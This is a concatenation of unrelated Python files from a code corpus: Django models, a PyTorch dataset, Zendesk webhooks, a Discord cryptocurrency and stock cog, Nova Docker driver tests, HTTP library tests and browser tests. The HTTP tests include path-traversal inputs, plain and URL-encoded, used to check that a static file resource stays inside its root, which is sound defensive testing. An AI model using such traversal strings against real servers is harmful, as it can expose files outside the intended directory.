ordering = ['-created_at', '-id']
def __str__(self):
return self.title
class IdeaTeamMember(models.Model):
idea = models.ForeignKey(Idea, related_name='idea_team_member', on_delete=models.CASCADE)
member = models.OneToOneField('events.Registrant', related_name='member_idea', on_delete=models.CASCADE)
class Meta():
ordering = ['idea']
unique_together = ('idea', 'member')
verbose_name = 'Team Member'
verbose_name_plural = 'Groups'
| 2.09375 | 2 |
section2/out/src/data_prep/SlicesDataset.py | ssheikh85/AIHCND_c3_3d_imaging | 0 | 5063 | <reponame>ssheikh85/AIHCND_c3_3d_imaging
"""
Module for Pytorch dataset representations
"""
import torch
from torch.utils.data import Dataset
class SlicesDataset(Dataset):
"""
This class represents an indexable Torch dataset
which could be consumed by the PyTorch DataLoader class
"""
def __init__(self, data):
self.data = data
self.slices = []
for i, d in enumerate(data):
for j in range(d["image"].shape[0]):
self.slices.append((i, j))
def __getitem__(self, idx):
"""
This method is called by PyTorch DataLoader class to return a sample with id idx
Arguments:
idx {int} -- id of sample
Returns:
Dictionary of 2 Torch Tensors of dimensions [1, W, H]
"""
slc = self.slices[idx]
sample = dict()
sample["id"] = idx
# You could implement caching strategy here if dataset is too large to fit
# in memory entirely
# Also this would be the place to call transforms if data augmentation is used
# TASK: Create two new keys in the "sample" dictionary, named "image" and "seg"
# The values are 3D Torch Tensors with image and label data respectively.
# First dimension is size 1, and last two hold the voxel data from the respective
# slices. Write code that stores the 2D slice data in the last 2 dimensions of the 3D Tensors.
# Your tensor needs to be of shape [1, patch_size, patch_size]
# Don't forget that you need to put a Torch Tensor into your dictionary element's value
# Hint: your 3D data sits in self.data variable, the id of the 3D volume from data array
# and the slice number are in the slc variable.
# Hint2: You can use None notation like so: arr[None, :] to add size-1
# dimension to a Numpy array
# <YOUR CODE GOES HERE>
img = self.data[slc[0]]["image"][slc[1]]
sample['image'] = torch.from_numpy(img[None,:])
seg = self.data[slc[0]]["seg"][slc[1]]
sample['seg'] = torch.from_numpy(seg[None,:])
return sample
def __len__(self):
"""
This method is called by PyTorch DataLoader class to return number of samples in the dataset
Returns:
int
"""
return len(self.slices)
| 3.5 | 4 |
zenslackchat/zendesk_webhooks.py | uktrade/zenslackchat | 2 | 5064 | from zenslackchat.zendesk_base_webhook import BaseWebHook
from zenslackchat.zendesk_email_to_slack import email_from_zendesk
from zenslackchat.zendesk_comments_to_slack import comments_from_zendesk
class CommentsWebHook(BaseWebHook):
"""Handle Zendesk Comment Events.
"""
def handle_event(self, event, slack_client, zendesk_client):
"""Handle the comment trigger event we have been POSTed.
Recover and update the comments with lastest from Zendesk.
"""
comments_from_zendesk(event, slack_client, zendesk_client)
class EmailWebHook(BaseWebHook):
"""Handle Zendesk Email Events.
"""
def handle_event(self, event, slack_client, zendesk_client):
"""Handle an email created issue and create it on slack.
"""
email_from_zendesk(event, slack_client, zendesk_client)
| 2.125 | 2 |
Examples/PagesOperations/MovePage.py | groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples | 0 | 5065 | <reponame>groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples
# Import modules
import groupdocs_merger_cloud
from Common import Common
# This example demonstrates how to move document page to a new position
class MovePage:
@classmethod
def Run(cls):
pagesApi = groupdocs_merger_cloud.PagesApi.from_config(Common.GetConfig())
options = groupdocs_merger_cloud.MoveOptions()
options.file_info = groupdocs_merger_cloud.FileInfo("WordProcessing/four-pages.docx")
options.output_path = "Output/move-pages.docx"
options.page_number = 1
options.new_page_number = 2
result = pagesApi.move(groupdocs_merger_cloud.MoveRequest(options))
print("Output file path = " + result.path) | 2.5 | 2 |
src/models/predict_model.py | joseluistello/Regression-Analysis-Apple-Data | 0 | 5066 | y_pred=ml.predict(x_test)
print(y_pred)
from sklearn.metrics import r2_score
r2_score(y_test,y_pred)
pred_y_df=pd.DataFrame({'Actual Value':y_test,'Predicted Value':y_pred, 'Difference': y_test-y_pred})
pred_y_df[0:20] | 2.796875 | 3 |
src/models/utils_func.py | Soufiane-Fartit/cars-prices | 0 | 5067 | <reponame>Soufiane-Fartit/cars-prices<filename>src/models/utils_func.py
# -*- coding: utf-8 -*-
""" This module offers util functions to be called and used
in other modules
"""
from datetime import datetime
import os
import json
import pickle
import string
import random
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import tree
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
"""GENERATE A RANDOM STRING TO BE USED AS AN ID
Args:
size (int, optional): size of the string. Defaults to 6.
chars (str, optional): charachters to be used to generate the string.
Defaults to string.ascii_lowercase+string.digits.
Returns:
[str]: a random chain of charachters
"""
return "".join(random.choice(chars) for _ in range(size))
def save_model(path, model):
"""SAVE MODEL INTO PICKLE FILE
Args:
path (str): path where to save the model
model (binary): the model to be saved
"""
with open(path, "wb") as file:
pickle.dump(model, file)
def update_history(models_hist_path, model_id, model_name, model, params):
"""SAVE METADATA RELATED TO THE TRAINED MODEL INTO THE HISTORY FILE
Args:
models_hist_path (str): path to the history file
model_id (str): unique id of the model
model_name (str): model name = "model_"+model_id+".pkl"
model (binary): binary file of the model
params (dict): dictionnary containing the hyper-parameters
used to fit the model
"""
model_metadata = dict()
model_metadata["trained"] = str(datetime.now())
model_metadata["model_type"] = type(model).__name__
model_metadata["model_id"] = model_id
model_metadata["params"] = params
print(model_metadata)
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name] = model_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
json.dump({model_name: model_metadata}, outfile, indent=4)
def update_history_add_eval(
models_hist_path, model_id=None, model_name=None, metrics=None
):
"""ADD EVALUATION METRICS THE HISTORY FILE FOR THE SPECIFIED MODEL
Args:
models_hist_path (str): path to the history file
model_id (str, optional): the id of the model. Defaults to None.
model_name (str, optional): the name of the model. Defaults to None.
metrics (dict, optional): a dictionnary containing metadata related
to the model evaluation. Defaults to None.
"""
assert (
model_id is not None or model_name is not None
), "At least the model id or name must be given"
assert models_hist_path is not None, "You must specify the path to the history file"
if not model_name:
model_name = "model_" + model_id + ".pkl"
eval_metadata = dict()
eval_metadata["datetime"] = str(datetime.now())
eval_metadata["metrics"] = metrics
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name]["evaluation"] = eval_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
print("cannot save evaluation metadata")
def generate_features_importance_plot(model, features, model_id):
"""GENERATES A PLOT DESCRIBING FEATURES IMPORTANCE FOR THE MODEL
TO MAKE THE PREDICTION.
Args:
model (tree-based model): a tree based model (decision tree, random forest ...)
features (pandas dataframe): a table of the features on which we trained the model
model_id (str): the unique id of the model
"""
mean_importances = model.feature_importances_
importances_indices = np.argsort(mean_importances)[::-1]
ordered_columns = [features.columns[i] for i in importances_indices]
importances = pd.DataFrame(
[tree.feature_importances_ for tree in model.estimators_],
columns=features.columns,
)
importances = importances[ordered_columns]
_, ax = plt.subplots(figsize=(12, 8))
sns.boxplot(x="variable", y="value", ax=ax, data=pd.melt(importances))
figure = ax.get_figure()
figure.savefig(
"models/models-training/run_" + model_id + "/features_importance.png"
)
def plot_trees(rf, feature_names, target_names, model_id):
"""GENERATES A PLOT THAT SHOWS THE DECISION MAKING OF THE TREES
Args:
rf (model): a tree based model (random forest ...)
feature_names (list): names of the columns of the training set
target_names (str): name of the target columns
model_id (str): unique id of the model
"""
fn = feature_names
cn = target_names
fig, axes = plt.subplots(nrows=1, ncols=5, figsize=(10, 2), dpi=900)
for index in range(0, 5):
tree.plot_tree(
rf.estimators_[index],
feature_names=fn,
class_names=cn,
filled=True,
ax=axes[index],
)
axes[index].set_title("Estimator: " + str(index), fontsize=11)
fig.savefig("models/models-training/run_" + model_id + "/Trees.png")
def get_id_list(N=6):
print (os.getcwd())
print([x[0] for x in os.walk("../../models/models-training")])
return [x[0][-N:] for x in os.walk("../../models/models-training")][1:] | 2.78125 | 3 |
modules/finance.py | KpaBap/palbot | 0 | 5068 | import asyncio
import discord
from discord.ext import commands
import re
import sqlite3
from urllib.parse import quote as uriquote
import html
CURR = ["AUD", "BRL", "CAD", "CHF", "CLP", "CNY", "CZK", "DKK", "EUR",
"GBP", "HKD", "HUF", "IDR", "ILS", "INR", "JPY", "KRW", "MXN",
"MYR", "NOK", "NZD", "PHP", "PKR", "PLN", "RUB", "SEK", "SGD",
"THB", "TRY", "TWD", "ZAR"]
class Finance(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def coin(self, ctx, *, line: str):
"""Look up a cryptocurrency such as Bitcoin
Optionally specify a quantity such as `0.6 ETH`
Optionally specify a conversion value such as `2 BTC in ETH` or `ETH in CAD`"""
coin = await self.parse_coinline(line)
if not coin:
await ctx.send(f"Unable to find coin {line}")
return
url = f"https://api.coinmarketcap.com/v1/ticker/{coin['coin']}{coin['currency']}"
async with self.bot.session.get(url) as resp:
data = await resp.json()
data = data[0]
cid = data['symbol'].upper()
name = data['name']
pUSD = data['price_usd']
pC24 = data['percent_change_24h']
pC1 = data['percent_change_1h']
output = ""
if coin.get('cvtto', ''):
cvtval = await self.convert_coin(coin, data)
if not cvtval:
await ctx.send(f"Failed to look up {coin['cvtto']}")
return
if coin['qty'] == 1:
output = "{} {} | Value: {} {} (${} USD) | 1-hour change: {}% | 24-hour change: {}%".format(cid, name, cvtval, coin['cvtto'].upper(), pUSD, pC1, pC24)
else:
usdfinal = float(pUSD) * coin['qty']
output = "{} {} : {} {} (${:.2f} USD)".format(coin['qty'], cid, cvtval, coin['cvtto'].upper(), usdfinal)
else:
if coin['qty'] == 1:
output = "{} {} | Value: ${} | 1-hour change: {}% | 24-hour change: {}%".format(cid, name, pUSD, pC1, pC24)
else:
finalprice = float(pUSD) * coin['qty']
output = "{} {} : ${:.2f}".format(coin['qty'], cid, finalprice)
if output:
await ctx.send(output)
async def convert_coin(self, coin, data):
if coin['currency']:
cvtval = "{:.2f}".format(float(data['price_{}'.format(coin['cvtto'].lower())]) * coin['qty'])
else:
if not coin['cvtto']:
cvtval = ''
if coin['cvtto'] == "bitcoin":
#api gives us BTC by default
cvtval = self.ffstr(float(data['price_btc']) * coin['qty'])
coin['cvtto'] = "BTC"
else:
pUSD = data['price_usd']
url = "https://api.coinmarketcap.com/v1/ticker/{}".format(coin['cvtto'])
async with self.bot.session.get(url) as resp:
tojson = await resp.json()
coin['cvtto'] = tojson[0]['symbol'].upper()
toval = float(tojson[0]['price_usd'])
cvtval = self.ffstr((float(pUSD) * coin['qty']) / toval)
return cvtval
def ffstr(self, number):
return "{:.8f}".format(float(number)).rstrip('0').rstrip('.')
async def parse_coinline(self, line):
coinqty = 1
qtycheck = re.search(r"(^(\d*\.)?\d+)\s?(\w.+)", line)
if qtycheck:
coinqty = float(qtycheck.group(1))
line = qtycheck.group(3).strip()
curr = ""
cvtto = ""
if " in " in line or " to " in line:
if " in " in line:
coin, cvtto = line.split(" in ")
elif " to " in line:
coin, cvtto = line.split(" to ")
coinid = await self.findcoin(coin)
if cvtto.upper() in CURR:
curr = "?convert={}".format(cvtto)
else:
cvtto = await self.findcoin(cvtto)
else:
coin = line
coinid = await self.findcoin(coin)
if not coinid:
return None
return {'coin': coinid,
'qty': coinqty,
'currency': curr,
'cvtto': cvtto}
async def findcoin(self, coin):
conn = sqlite3.connect("coins.sqlite3")
cursor = conn.cursor()
result = cursor.execute("SELECT coinid FROM coins WHERE coinid = (?) OR symbol = (?)", (coin, coin)).fetchone()
if not result:
like = "%{}%".format(coin)
result = cursor.execute("SELECT coinid FROM coins WHERE name LIKE (?)", [like]).fetchone()
if result:
return result[0]
@commands.command(hidden=True)
@commands.is_owner()
async def newcoins(self, ctx):
conn = sqlite3.connect("coins.sqlite3")
cursor = conn.cursor()
result = cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='coins';").fetchone()
if not result:
cursor.execute("CREATE TABLE 'coins' ('symbol' TEXT, 'coinid' TEXT UNIQUE ON CONFLICT REPLACE, 'name' TEXT);")
conn.commit()
url = "https://api.coinmarketcap.com/v1/ticker/?limit=0"
async with self.bot.session.get(url) as resp:
data = await resp.json()
for coin in data:
sym = coin['symbol'].lower()
cid = coin['id'].lower()
name = coin['name'].lower()
cursor.execute("insert into coins values (?, ?, ?)", (sym,cid,name))
conn.commit()
conn.close()
@commands.command(aliases=['stonks', 'stocks'])
async def stock (self, ctx, name: str):
"""Look up a stock and show its current price, change, etc"""
symbol = ""
url = f"https://autoc.finance.yahoo.com/autoc?query={uriquote(name)}®ion=1&lang=en&guccounter=1"
async with self.bot.session.get(url) as resp:
data = await resp.json()
symbol = data['ResultSet']['Result'][0]['symbol']
if not symbol:
await ctx.send(f"Unable to find a stonk named `{name}`")
return
url = f"http://query1.finance.yahoo.com/v7/finance/quote?symbols={symbol}"
async with self.bot.session.get(url) as resp:
data = await resp.json()
data = data["quoteResponse"]["result"][0]
downup = "\N{CHART WITH UPWARDS TREND}" if data['regularMarketChange'] > 0 else "\N{CHART WITH DOWNWARDS TREND}"
outstr = "{}{}: {} {} :: Today's change: {:.2f} ({:.2f}%) {}"
longn = ' ({})'.format(data['shortName']) if 'shortName' in data else ''
outstr = outstr.format(data['symbol'], longn, data['regularMarketPrice'], data['currency'],
float(data['regularMarketChange']), float(data['regularMarketChangePercent']),
downup)
if 'postMarketPrice' in data and (data['marketState'] == "CLOSED" or "POST" in data['marketState']):
pdu = "\N{CHART WITH UPWARDS TREND}" if data['postMarketChange'] > 0 else "\N{CHART WITH DOWNWARDS TREND}"
outstr += " :: After Hours: {:.2f} - Change: {:.2f} {}".format(data['postMarketPrice'],
data['postMarketChange'], pdu)
await ctx.send(html.unescape(outstr))
def setup(bot):
bot.add_cog(Finance(bot))
| 2.984375 | 3 |
SG_GetDataForClassifier.py | shubha1593/MovieReviewAnalysis | 7 | 5069 | <reponame>shubha1593/MovieReviewAnalysis<filename>SG_GetDataForClassifier.py<gh_stars>1-10
from SG_GetFeatureMatrix import *
from SG_VectorY import *
featureMatrix = featureMatrixFromReviews()
Y = getYVector()
def getDataForClassifier() :
return featureMatrix, Y | 1.953125 | 2 |
greenbounty/bounties/migrations/0001_initial.py | Carnales/green-bounty | 1 | 5070 | <gh_stars>1-10
# Generated by Django 3.1.4 on 2021-01-17 19:12
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, null=True)),
('balance', models.FloatField()),
('total', models.FloatField()),
],
),
migrations.CreateModel(
name='Hunter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='')),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Bounty',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='')),
('price', models.FloatField()),
('city', models.CharField(max_length=25, null=True)),
('hunter', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='bounties.hunter')),
],
),
]
| 1.742188 | 2 |
nova/tests/virt/docker/test_driver.py | osrg/nova | 0 | 5071 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2013 dotCloud, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import socket
import mock
from nova import context
from nova import exception
from nova.openstack.common import jsonutils
from nova.openstack.common import units
from nova import test
from nova.tests import utils
import nova.tests.virt.docker.mock_client
from nova.tests.virt.test_virt_drivers import _VirtDriverTestCase
from nova.virt.docker import hostinfo
from nova.virt.docker import network
class DockerDriverTestCase(_VirtDriverTestCase, test.TestCase):
driver_module = 'nova.virt.docker.DockerDriver'
def setUp(self):
super(DockerDriverTestCase, self).setUp()
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'docker',
nova.tests.virt.docker.mock_client.MockClient())
def fake_setup_network(self, instance, network_info):
return
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'_setup_network',
fake_setup_network)
def fake_get_registry_port(self):
return 5042
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'_get_registry_port',
fake_get_registry_port)
# Note: using mock.object.path on class throws
# errors in test_virt_drivers
def fake_teardown_network(container_id):
return
self.stubs.Set(network, 'teardown_network', fake_teardown_network)
self.context = context.RequestContext('fake_user', 'fake_project')
def test_driver_capabilities(self):
self.assertFalse(self.connection.capabilities['has_imagecache'])
self.assertFalse(self.connection.capabilities['supports_recreate'])
#NOTE(bcwaldon): This exists only because _get_running_instance on the
# base class will not let us set a custom disk/container_format.
def _get_running_instance(self, obj=False):
instance_ref = utils.get_test_instance(obj=obj)
network_info = utils.get_test_network_info()
network_info[0]['network']['subnets'][0]['meta']['dhcp_server'] = \
'1.1.1.1'
image_info = utils.get_test_image_info(None, instance_ref)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.ctxt, jsonutils.to_primitive(instance_ref),
image_info, [], 'herp', network_info=network_info)
return instance_ref, network_info
def test_get_host_stats(self):
self.mox.StubOutWithMock(socket, 'gethostname')
socket.gethostname().AndReturn('foo')
socket.gethostname().AndReturn('bar')
self.mox.ReplayAll()
self.assertEqual('foo',
self.connection.get_host_stats()['host_hostname'])
self.assertEqual('foo',
self.connection.get_host_stats()['host_hostname'])
def test_get_available_resource(self):
memory = {
'total': 4 * units.Mi,
'free': 3 * units.Mi,
'used': 1 * units.Mi
}
disk = {
'total': 50 * units.Gi,
'available': 25 * units.Gi,
'used': 25 * units.Gi
}
# create the mocks
with contextlib.nested(
mock.patch.object(hostinfo, 'get_memory_usage',
return_value=memory),
mock.patch.object(hostinfo, 'get_disk_usage',
return_value=disk)
) as (
get_memory_usage,
get_disk_usage
):
# run the code
stats = self.connection.get_available_resource(nodename='test')
# make our assertions
get_memory_usage.assert_called_once_with()
get_disk_usage.assert_called_once_with()
expected_stats = {
'vcpus': 1,
'vcpus_used': 0,
'memory_mb': 4,
'memory_mb_used': 1,
'local_gb': 50L,
'local_gb_used': 25L,
'disk_available_least': 25L,
'hypervisor_type': 'docker',
'hypervisor_version': 1000,
'hypervisor_hostname': 'test',
'cpu_info': '?',
'supported_instances': ('[["i686", "docker", "lxc"],'
' ["x86_64", "docker", "lxc"]]')
}
self.assertEqual(expected_stats, stats)
def test_plug_vifs(self):
# Check to make sure the method raises NotImplementedError.
self.assertRaises(NotImplementedError,
self.connection.plug_vifs,
instance=utils.get_test_instance(),
network_info=None)
def test_unplug_vifs(self):
# Check to make sure the method raises NotImplementedError.
self.assertRaises(NotImplementedError,
self.connection.unplug_vifs,
instance=utils.get_test_instance(),
network_info=None)
def test_create_container(self, image_info=None):
instance_href = utils.get_test_instance()
if image_info is None:
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.context, instance_href, image_info,
'fake_files', '<PASSWORD>_password')
self._assert_cpu_shares(instance_href)
def test_create_container_vcpus_2(self, image_info=None):
flavor = utils.get_test_flavor(options={
'name': 'vcpu_2',
'flavorid': 'vcpu_2',
'vcpus': 2
})
instance_href = utils.get_test_instance(flavor=flavor)
if image_info is None:
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.context, instance_href, image_info,
'fake_files', 'fake_password')
self._assert_cpu_shares(instance_href, vcpus=2)
def _assert_cpu_shares(self, instance_href, vcpus=4):
container_id = self.connection.find_container_by_name(
instance_href['name']).get('id')
container_info = self.connection.docker.inspect_container(container_id)
self.assertEqual(vcpus * 1024, container_info['Config']['CpuShares'])
def test_create_container_wrong_image(self):
instance_href = utils.get_test_instance()
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'invalid_format'
self.assertRaises(exception.InstanceDeployFailure,
self.test_create_container,
image_info)
@mock.patch.object(network, 'teardown_network')
@mock.patch.object(nova.virt.docker.driver.DockerDriver,
'find_container_by_name', return_value={'id': 'fake_id'})
def test_destroy_container(self, byname_mock, teardown_mock):
instance = utils.get_test_instance()
self.connection.destroy(self.context, instance, 'fake_networkinfo')
byname_mock.assert_called_once_with(instance['name'])
teardown_mock.assert_called_with('fake_id')
def test_get_memory_limit_from_sys_meta_in_object(self):
instance = utils.get_test_instance(obj=True)
limit = self.connection._get_memory_limit_bytes(instance)
self.assertEqual(2048 * units.Mi, limit)
def test_get_memory_limit_from_sys_meta_in_db_instance(self):
instance = utils.get_test_instance(obj=False)
limit = self.connection._get_memory_limit_bytes(instance)
self.assertEqual(2048 * units.Mi, limit)
| 1.796875 | 2 |
pyx/tests/test_http.py | l04m33/pyx | 2 | 5072 | import unittest
import unittest.mock as mock
import asyncio
import pyx.http as http
def create_dummy_message():
msg = http.HttpMessage(None)
msg.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Cookie', 'a'),
http.HttpHeader('Cookie', 'b'),
]
return msg
def create_dummy_connection():
loop = asyncio.get_event_loop()
reader = asyncio.StreamReader(loop=loop)
@asyncio.coroutine
def dummy_drain():
yield from asyncio.sleep(0.001)
writer = mock.Mock(spec=asyncio.StreamWriter)
writer.attach_mock(mock.Mock(wraps=dummy_drain), 'drain')
conn = http.HttpConnection(reader, writer)
return conn
def create_dummy_request():
conn = create_dummy_connection()
req = http.HttpRequest(conn)
return req
class TestHttpMessage(unittest.TestCase):
def test_get_header(self):
msg = create_dummy_message()
self.assertEqual(msg.get_header("server"), ["Pyx"])
self.assertEqual(msg.get_header("SERVER"), ["Pyx"])
self.assertEqual(msg.get_header("pragma"), [])
self.assertEqual(msg.get_header("cookie"), ["a", "b"])
self.assertEqual(msg.get_first_header("cookie"), "a")
self.assertTrue(msg.get_first_header("pragma") is None)
def test_write_headers(self):
msg = create_dummy_message()
self.assertEqual(msg.write_headers(),
['Server: Pyx', 'Cookie: a', 'Cookie: b'])
msg.headers = []
self.assertEqual(msg.write_headers(), [])
class TestHttpRequest(unittest.TestCase):
def test_parse_req_line(self):
req = create_dummy_request()
req._parse_req_line(b'POST / HTTP/1.1\r\n')
self.assertEqual(req.method, 'POST')
self.assertEqual(req.path, '/')
self.assertTrue(req.query is None)
self.assertEqual(req.protocol, 'HTTP')
self.assertEqual(req.version, (1, 1))
req._parse_req_line(
b'GET /some/path?some=query&some_other=query HTTP/1.1\r\n')
self.assertEqual(req.method, 'GET')
self.assertEqual(req.path, '/some/path')
self.assertEqual(req.query, 'some=query&some_other=query')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'GET /\r\n')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'GET / GARBAGE\r\n')
req._parse_req_line(b'GET / HTTP/1\r\n')
self.assertEqual(req.version, (1, 0))
def test_parse_header(self):
req = create_dummy_request()
req._parse_header(b'Server: Pyx\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', 'Pyx')])
req.headers = []
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b'Server\r\n')
req.headers = []
req._parse_header(b'Server:\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', '')])
req.headers = []
req._parse_header(b'Server: \r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', '')])
req.headers = []
req._parse_header(b'Host: some.badasshost.com:8080\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Host', 'some.badasshost.com:8080')])
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b': pyx\r\n')
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b' : pyx')
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b' \t : pyx')
def test_parse(self):
loop = asyncio.get_event_loop()
conn = create_dummy_connection()
reader = conn.reader
reader.feed_data(
b'GET /?q=p&s=t HTTP/1.1\r\n'
b'Host: localhost\r\n'
b'Connection: Keep-Alive\r\n'
b'Pragma: Test\r\n'
b' : Test\r\n'
b'\r\n')
req = loop.run_until_complete(http.HttpRequest.parse(conn))
self.assertEqual(req.method, 'GET')
self.assertEqual(req.path, '/')
self.assertEqual(req.query, 'q=p&s=t')
self.assertEqual(req.protocol, 'HTTP')
self.assertEqual(req.version, (1, 1))
self.assertEqual(req.headers,
[
http.HttpHeader('Host', 'localhost'),
http.HttpHeader('Connection', 'Keep-Alive'),
http.HttpHeader('Pragma', 'Test'),
])
def test_respond(self):
req = create_dummy_request()
req.version = (1, 1)
resp = req.respond(200)
self.assertEqual(resp.code, 200)
self.assertEqual(resp.version, (1, 1))
req.version = (1, 0)
resp = req.respond(400)
self.assertEqual(resp.code, 400)
self.assertEqual(resp.version, (1, 0))
class TestHttpResponse(unittest.TestCase):
def test_write(self):
resp = http.HttpResponse(200, None)
resp.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Connection', 'keep-alive')
]
self.assertEqual(resp.write(),
['HTTP/1.1 200 OK',
'Server: Pyx',
'Connection: keep-alive',
'\r\n'])
self.assertEqual(str(resp),
'HTTP/1.1 200 OK\r\n'
'Server: Pyx\r\n'
'Connection: keep-alive\r\n'
'\r\n')
def test_send(self):
loop = asyncio.get_event_loop()
req = create_dummy_request()
resp = req.respond(200)
self.assertEqual(resp.code, 200)
self.assertFalse(req.responded)
resp.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Content-Length', '100'),
http.HttpHeader('Content-Type', 'text/plain'),
]
loop.run_until_complete(resp.send())
resp.connection.writer.write.assert_called_with(str(resp).encode())
self.assertTrue(req.responded)
def test_send_body(self):
loop = asyncio.get_event_loop()
req = create_dummy_request()
resp = req.respond(200)
loop.run_until_complete(resp.send())
self.assertTrue(req.responded)
loop.run_until_complete(resp.send_body(b'Yes, this is the body.'))
resp.connection.writer.write.assert_called_with(b'Yes, this is the body.')
loop.run_until_complete(resp.send_body('This is another string body.'))
resp.connection.writer.write.assert_called_with(b'This is another string body.')
class DummyResource(http.UrlResource):
def get_child(self, key):
if key == 'hello':
return self
elif key == "static":
return http.StaticRootResource('.')
else:
raise http.HttpError(404, '{} not found'.format(key))
class TestUrlResource(unittest.TestCase):
def test_traverse(self):
res = DummyResource()
self.assertEqual(res.traverse(''), res)
self.assertEqual(res.traverse('/'), res)
self.assertEqual(res.traverse('/hello'), res)
with self.assertRaises(http.HttpError):
res.traverse('/does/not/exist')
sres = res.traverse('/static')
self.assertEqual(sres.root, '.')
self.assertEqual(sres._build_real_path(), '.')
sres = res.traverse('/static/')
self.assertEqual(sres._build_real_path(), '.')
sres = res.traverse('/static/some/path')
self.assertEqual(sres._build_real_path(), './some/path')
def test_not_implemented(self):
res = http.UrlResource()
with self.assertRaises(NotImplementedError):
res.traverse('/hello')
req = create_dummy_request()
with self.assertRaises(NotImplementedError):
res.handle_request(req)
class TestStaticRootResource(unittest.TestCase):
def test_build_real_path(self):
res = http.StaticRootResource('local_root')
res = res.traverse('/some/long/path/where/ever/it/leads/')
self.assertEqual(res._build_real_path(),
'local_root/some/long/path/where/ever/it/leads')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/../dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/../../dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/%2e%2e%2f%2e%2e/dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
| 2.5625 | 3 |
tests/test_webdriver_chrome.py | kidosoft/splinter | 1 | 5073 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Copyright 2013 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import os
import unittest
from splinter import Browser
from .fake_webapp import EXAMPLE_APP
from .base import WebDriverTests
from selenium.common.exceptions import WebDriverException
def chrome_installed():
try:
Browser("chrome")
except WebDriverException:
return False
return True
class ChromeBrowserTest(WebDriverTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.browser = Browser("chrome")
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
self.browser.visit(EXAMPLE_APP)
def test_attach_file(self):
"should provide a way to change file field value"
file_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
'mockfile.txt'
)
self.browser.attach_file('file', file_path)
self.browser.find_by_name('upload').click()
html = self.browser.html
self.assertIn('text/plain', html)
self.assertIn(open(file_path).read().encode('utf-8'), html)
def test_should_support_with_statement(self):
with Browser('chrome') as internet:
pass
class ChromeBrowserFullscreenTest(WebDriverTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.browser = Browser("chrome", fullscreen=True)
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
self.browser.visit(EXAMPLE_APP)
def test_should_support_with_statement(self):
with Browser('chrome', fullscreen=True) as internet:
pass
| 2.328125 | 2 |
